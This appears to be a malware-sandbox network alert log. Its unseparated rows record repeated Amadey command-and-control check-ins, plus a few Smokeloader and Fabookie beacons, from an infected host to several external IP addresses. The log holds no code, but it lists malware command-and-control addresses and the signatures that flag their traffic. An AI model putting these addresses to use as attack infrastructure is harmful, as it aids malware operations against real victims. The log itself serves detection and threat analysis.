                                                                                                                                                                                    192.168.2.445.66.230.12350027802027700 01/05/23-08:59:37.414842TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949860802027700 01/05/23-08:59:06.797494TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349923802027700 01/05/23-08:59:15.228371TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350073802027700 01/05/23-08:59:46.797360TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350379802027700 01/05/23-09:00:22.115548TCP2027700ET TROJAN Amadey CnC Check-In5037980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350771802027700 01/05/23-09:01:02.920270TCP2027700ET TROJAN Amadey CnC Check-In5077180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350045802027700 01/05/23-08:59:43.021741TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350251802027700 01/05/23-09:00:06.064860TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950433802027700 01/05/23-09:00:27.032752TCP2027700ET TROJAN Amadey CnC Check-In5043380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349984802027700 01/05/23-08:59:29.123303TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950255802027700 01/05/23-09:00:06.468696TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350392802027700 01/05/23-09:00:23.288275TCP2027700ET TROJAN Amadey CnC Check-In5039280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350040802027700 01/05/23-08:59:41.869933TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.159.1849987802851115 01/05/23-08:59:29.990043TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M24998780192.168.2.445.66.159.18
                                                                                                                                                                                    192.168.2.445.66.230.12350688802027700 01/05/23-09:00:55.451575TCP2027700ET TROJAN Amadey CnC Check-In5068880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350336802027700 01/05/23-09:00:16.869738TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950232802027700 01/05/23-09:00:04.235940TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350554802027700 01/05/23-09:00:41.088042TCP2027700ET TROJAN Amadey CnC Check-In5055480192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.4200.46.66.7150015802851815 01/05/23-08:59:34.306720TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 185001580192.168.2.4200.46.66.71
                                                                                                                                                                                    192.168.2.462.204.41.10950662802027700 01/05/23-09:00:52.966787TCP2027700ET TROJAN Amadey CnC Check-In5066280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950757802027700 01/05/23-09:01:01.880943TCP2027700ET TROJAN Amadey CnC Check-In5075780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350369802027700 01/05/23-09:00:20.866024TCP2027700ET TROJAN Amadey CnC Check-In5036980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350626802027700 01/05/23-09:00:47.433838TCP2027700ET TROJAN Amadey CnC Check-In5062680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949832802027700 01/05/23-08:58:58.603516TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950160802027700 01/05/23-08:59:57.457133TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950288802027700 01/05/23-09:00:09.468554TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950069802027700 01/05/23-08:59:46.420495TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950082802027700 01/05/23-08:59:48.081991TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350761802027700 01/05/23-09:01:02.150426TCP2027700ET TROJAN Amadey CnC Check-In5076180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950260802027700 01/05/23-09:00:07.014361TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949819802027700 01/05/23-08:58:55.037438TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950064802027700 01/05/23-08:59:45.584606TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350364802027700 01/05/23-09:00:20.229662TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350145802027700 01/05/23-08:59:54.297296TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950631802027700 01/05/23-09:00:47.877884TCP2027700ET TROJAN Amadey CnC Check-In5063180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350598802027700 01/05/23-09:00:44.565880TCP2027700ET TROJAN Amadey CnC Check-In5059880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350442802027700 01/05/23-09:00:27.991688TCP2027700ET TROJAN Amadey CnC Check-In5044280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949837802027700 01/05/23-08:59:01.164961TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350682802027700 01/05/23-09:00:54.925031TCP2027700ET TROJAN Amadey CnC Check-In5068280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350733802027700 01/05/23-09:00:59.735470TCP2027700ET TROJAN Amadey CnC Check-In5073380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350807802027700 01/05/23-09:01:05.892247TCP2027700ET TROJAN Amadey CnC Check-In5080780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950680802027700 01/05/23-09:00:54.534639TCP2027700ET TROJAN Amadey CnC Check-In5068080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950132802027700 01/05/23-08:59:53.254371TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350274802027700 01/05/23-09:00:08.240684TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950606802027700 01/05/23-09:00:45.465505TCP2027700ET TROJAN Amadey CnC Check-In5060680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350183802027700 01/05/23-08:59:59.313846TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950603802027700 01/05/23-09:00:45.162245TCP2027700ET TROJAN Amadey CnC Check-In5060380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949770802027700 01/05/23-08:58:45.266341TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949847802027700 01/05/23-08:59:04.128946TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350196802027700 01/05/23-09:00:00.463904TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949870802027700 01/05/23-08:59:08.531190TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350687802027700 01/05/23-09:00:55.430298TCP2027700ET TROJAN Amadey CnC Check-In5068780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949769802027700 01/05/23-08:58:44.873665TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350374802027700 01/05/23-09:00:21.383981TCP2027700ET TROJAN Amadey CnC Check-In5037480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950310802027700 01/05/23-09:00:11.683603TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950097802027700 01/05/23-08:59:49.704779TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349974802027700 01/05/23-08:59:27.799434TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350593802027700 01/05/23-09:00:44.123045TCP2027700ET TROJAN Amadey CnC Check-In5059380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350516802027700 01/05/23-09:00:37.594832TCP2027700ET TROJAN Amadey CnC Check-In5051680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350220802027700 01/05/23-09:00:03.013302TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.4211.40.39.25149980802851815 01/05/23-08:59:28.909642TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184998080192.168.2.4211.40.39.251
                                                                                                                                                                                    192.168.2.445.66.230.12350776802027700 01/05/23-09:01:03.330542TCP2027700ET TROJAN Amadey CnC Check-In5077680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349861802027700 01/05/23-08:59:06.798813TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949875802027700 01/05/23-08:59:08.935997TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950204802027700 01/05/23-09:00:01.361188TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350750802027700 01/05/23-09:01:00.979250TCP2027700ET TROJAN Amadey CnC Check-In5075080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350083802027700 01/05/23-08:59:48.320016TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350076802027700 01/05/23-08:59:47.347998TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350178802027700 01/05/23-08:59:58.809811TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950329802027700 01/05/23-09:00:16.071197TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350328802027700 01/05/23-09:00:16.076424TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350315802027700 01/05/23-09:00:12.211643TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350257802027700 01/05/23-09:00:06.668354TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350722802027700 01/05/23-09:00:58.572601TCP2027700ET TROJAN Amadey CnC Check-In5072280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349925802027700 01/05/23-08:59:15.658086TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349981802027700 01/05/23-08:59:28.854811TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950258802027700 01/05/23-09:00:06.751514TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350779802027700 01/05/23-09:01:03.739143TCP2027700ET TROJAN Amadey CnC Check-In5077980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950290802027700 01/05/23-09:00:09.751789TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350371802027700 01/05/23-09:00:21.155986TCP2027700ET TROJAN Amadey CnC Check-In5037180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949896802027700 01/05/23-08:59:11.826037TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350499802027700 01/05/23-09:00:36.209598TCP2027700ET TROJAN Amadey CnC Check-In5049980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350188802027700 01/05/23-08:59:59.839642TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949766802027700 01/05/23-08:58:40.852775TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950005802027700 01/05/23-08:59:32.550774TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950201802027700 01/05/23-09:00:01.069838TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350651802027700 01/05/23-09:00:52.589844TCP2027700ET TROJAN Amadey CnC Check-In5065180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350318802027700 01/05/23-09:00:12.832869TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12349918802027700 01/05/23-08:59:14.341314TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350537802027700 01/05/23-09:00:39.548579TCP2027700ET TROJAN Amadey CnC Check-In5053780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950459802027700 01/05/23-09:00:30.125983TCP2027700ET TROJAN Amadey CnC Check-In5045980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350794802027700 01/05/23-09:01:04.736982TCP2027700ET TROJAN Amadey CnC Check-In5079480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350302802027700 01/05/23-09:00:11.001548TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350728802027700 01/05/23-09:00:59.312783TCP2027700ET TROJAN Amadey CnC Check-In5072880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12349851802027700 01/05/23-08:59:04.864545TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949868802027700 01/05/23-08:59:08.167063TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350223802027700 01/05/23-09:00:03.373229TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350111802027700 01/05/23-08:59:51.099949TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949776802027700 01/05/23-08:58:47.022979TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949865802027700 01/05/23-08:59:07.706533TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950293802027700 01/05/23-09:00:10.018229TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350801802027700 01/05/23-09:01:05.514891TCP2027700ET TROJAN Amadey CnC Check-In5080180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350753802027700 01/05/23-09:01:01.501451TCP2027700ET TROJAN Amadey CnC Check-In5075380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949893802027700 01/05/23-08:59:11.534097TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350740802027700 01/05/23-09:01:00.158500TCP2027700ET TROJAN Amadey CnC Check-In5074080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949763802027700 01/05/23-08:58:39.887077TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350381802027700 01/05/23-09:00:22.389206TCP2027700ET TROJAN Amadey CnC Check-In5038180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950802802027700 01/05/23-09:01:05.461255TCP2027700ET TROJAN Amadey CnC Check-In5080280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350404802027700 01/05/23-09:00:24.419327TCP2027700ET TROJAN Amadey CnC Check-In5040480192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950624802027700 01/05/23-09:00:47.347216TCP2027700ET TROJAN Amadey CnC Check-In5062480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950560802027700 01/05/23-09:00:41.533952TCP2027700ET TROJAN Amadey CnC Check-In5056080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350124802027700 01/05/23-08:59:52.475789TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350343802027700 01/05/23-09:00:17.694310TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950227802027700 01/05/23-09:00:03.688487TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350309802027700 01/05/23-09:00:11.565614TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350214802027700 01/05/23-09:00:02.369106TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350701802027700 01/05/23-09:00:56.481195TCP2027700ET TROJAN Amadey CnC Check-In5070180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949805802027700 01/05/23-08:58:53.690359TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950678802027700 01/05/23-09:00:54.216882TCP2027700ET TROJAN Amadey CnC Check-In5067880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950620802027700 01/05/23-09:00:46.787763TCP2027700ET TROJAN Amadey CnC Check-In5062080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950326802027700 01/05/23-09:00:15.806375TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950452802027700 01/05/23-09:00:29.247094TCP2027700ET TROJAN Amadey CnC Check-In5045280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950100802027700 01/05/23-08:59:50.026244TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350527802027700 01/05/23-09:00:38.677413TCP2027700ET TROJAN Amadey CnC Check-In5052780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949989802027700 01/05/23-08:59:29.932735TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349880802027700 01/05/23-08:59:09.534066TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950617802027700 01/05/23-09:00:46.538369TCP2027700ET TROJAN Amadey CnC Check-In5061780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350345802027700 01/05/23-09:00:17.933632TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350697802027700 01/05/23-09:00:56.202740TCP2027700ET TROJAN Amadey CnC Check-In5069780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949838802027700 01/05/23-08:59:02.434163TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950301802027700 01/05/23-09:00:10.887501TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950751802027700 01/05/23-09:01:01.289899TCP2027700ET TROJAN Amadey CnC Check-In5075180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350239802027700 01/05/23-09:00:04.805599TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949956802027700 01/05/23-08:59:24.097365TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350519802027700 01/05/23-09:00:38.045914TCP2027700ET TROJAN Amadey CnC Check-In5051980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950609802027700 01/05/23-09:00:45.737326TCP2027700ET TROJAN Amadey CnC Check-In5060980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950030802027700 01/05/23-08:59:40.263648TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350608802027700 01/05/23-09:00:45.689518TCP2027700ET TROJAN Amadey CnC Check-In5060880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350270802027700 01/05/23-09:00:07.812383TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350105802027700 01/05/23-08:59:50.538555TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.4211.40.39.25149930802851815 01/05/23-08:59:16.388071TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184993080192.168.2.4211.40.39.251
                                                                                                                                                                                    192.168.2.445.66.230.12350079802027700 01/05/23-08:59:47.654139TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949825802027700 01/05/23-08:58:56.824088TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350158802027700 01/05/23-08:59:57.230242TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350816802027700 01/05/23-09:01:06.642475TCP2027700ET TROJAN Amadey CnC Check-In5081680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950043802027700 01/05/23-08:59:42.619809TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349955802027700 01/05/23-08:59:24.235160TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349857802027700 01/05/23-08:59:06.387562TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350546802027700 01/05/23-09:00:40.334545TCP2027700ET TROJAN Amadey CnC Check-In5054680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350088802027700 01/05/23-08:59:48.940730TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950514802027700 01/05/23-09:00:37.529136TCP2027700ET TROJAN Amadey CnC Check-In5051480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950321802027700 01/05/23-09:00:13.437731TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350605802027700 01/05/23-09:00:45.483828TCP2027700ET TROJAN Amadey CnC Check-In5060580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350754802027700 01/05/23-09:01:01.509686TCP2027700ET TROJAN Amadey CnC Check-In5075480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350066802027700 01/05/23-08:59:45.969649TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350579802027700 01/05/23-09:00:43.093350TCP2027700ET TROJAN Amadey CnC Check-In5057980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950264802027700 01/05/23-09:00:07.273682TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350325802027700 01/05/23-09:00:13.993553TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950007802027700 01/05/23-08:59:32.867939TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350250802027700 01/05/23-09:00:05.855487TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350616802027700 01/05/23-09:00:46.402098TCP2027700ET TROJAN Amadey CnC Check-In5061680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949858802027700 01/05/23-08:59:06.303869TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349844802027700 01/05/23-08:59:03.705485TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350125802027700 01/05/23-08:59:52.616338TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950339802027700 01/05/23-09:00:17.228637TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950547802027700 01/05/23-09:00:40.389420TCP2027700ET TROJAN Amadey CnC Check-In5054780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949969802027700 01/05/23-08:59:26.763344TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350131802027700 01/05/23-08:59:53.175791TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350320802027700 01/05/23-09:00:13.343604TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350385802027700 01/05/23-09:00:22.562941TCP2027700ET TROJAN Amadey CnC Check-In5038580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950370802027700 01/05/23-09:00:21.112704TCP2027700ET TROJAN Amadey CnC Check-In5037080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350652802027700 01/05/23-09:00:52.568964TCP2027700ET TROJAN Amadey CnC Check-In5065280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350006802027700 01/05/23-08:59:32.667620TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.445.66.230.123
